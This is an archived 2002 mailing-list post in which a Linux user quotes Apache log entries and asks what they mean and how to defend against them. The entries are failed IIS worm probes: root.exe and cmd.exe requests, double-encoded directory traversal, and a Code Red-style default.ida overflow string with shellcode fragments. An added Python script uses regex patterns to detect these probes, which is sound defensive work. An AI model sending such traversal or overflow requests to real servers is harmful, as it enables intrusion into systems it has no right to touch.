Apache logs -- hack -- security

adam_1 at centrum.cz
Tue Feb 19 12:50:42 CET 2002


Hello linux,

  Good day, when I was going through the Apache logs today I came
  across some things that look rather suspicious to me. Would there be
  someone here who could tell me who was trying to do what? Also,
  whether something like this can be used to get hold of /bin/bash (I
  don't want to say root, because another user is enough, and from
  there it is a matter of a few hours to get to root). If it is
  possible to get in this way, what is the defense?
This is what I found in the file /var/log/httpd/access_log
----------------------------------------------------------------------------------
212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:09 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 322 "-" "-"

Another file that caught my attention is /var/log/httpd/error_log
----------------------------------------------------------------------------------
[Mon Feb 18 19:48:11 2002] [error] [client 212.32.196.115] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 18 20:34:09 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 18 20:34:12 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/MSADC/root.exe
[Mon Feb 18 20:34:19 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Mon Feb 18 20:34:23 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Mon Feb 18 20:34:30 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 18 20:34:36 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

I also keep logs of unauthorized access attempts, and there someone
was trying the portmapper, ssh and ftp, nothing else.

When I think that I used to use WinNT for my Internet connection, a
chill runs down my spine at the thought of where all these hackers could have gotten to.

                                       Many thanks, Adam.

-- 
Best regards,
 adam                          mailto:adam_1 at centrum.cz
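As an added example (not part of the original post): a small Python triage script for access_log lines like the ones quoted above. It decodes each request target until it is stable, tags requests for Windows/IIS-style paths, and counts per client how many of them were answered with a status below 400; the rule names, the shortened sample lines and the 192.0.2.7 entry are constructed for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# client, request target and status from an Apache common/combined log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
RULES = [  # matched against the fully decoded request target
    ("root.exe probe", re.compile(r"/root\.exe", re.I)),
    ("cmd.exe request", re.compile(r"/winnt/system32/cmd\.exe", re.I)),
    ("directory traversal", re.compile(r"\.\.[\\/]")),
    ("default.ida long query", re.compile(r"^/default\.ida\?(.)\1{50,}", re.I)),
]

def fully_decode(target, max_rounds=5):
    # Percent-decode until stable, so %255c -> %5c -> backslash becomes visible
    for _ in range(max_rounds):
        target, previous = unquote(target), target
        if target == previous:
            break
    return target

def classify(line):
    # Returns (client, status, tags), or None for a line that does not parse
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m.group(2))
    tags = [name for name, rx in RULES if rx.search(decoded)]
    if decoded != unquote(m.group(2)):  # took more than one decoding round
        tags.append("double-encoded")
    return m.group(1), int(m.group(3)), tags

def summarize(lines):
    # Per client: tags seen, number of probes, probes answered below HTTP 400
    report = defaultdict(lambda: {"tags": set(), "probes": 0, "served": 0})
    for client, status, tags in filter(None, map(classify, lines)):
        if tags:
            report[client]["tags"].update(tags)
            report[client]["probes"] += 1
            report[client]["served"] += status < 400
    return dict(report)

# Constructed sample: shortened copies of lines from the post, plus one benign request
SAMPLE = [
    '212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"',
    '212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"',
    '213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?' + "N" * 60 + '%u9090%u6858 HTTP/1.0" 400 322 "-" "-"',
    '192.0.2.7 - - [19/Feb/2002:12:00:00 +0100] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

print(summarize(SAMPLE))
```

A non-zero `served` count for a client is the case that needs follow-up; for the lines in the post every probe was answered with 404 or 400.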



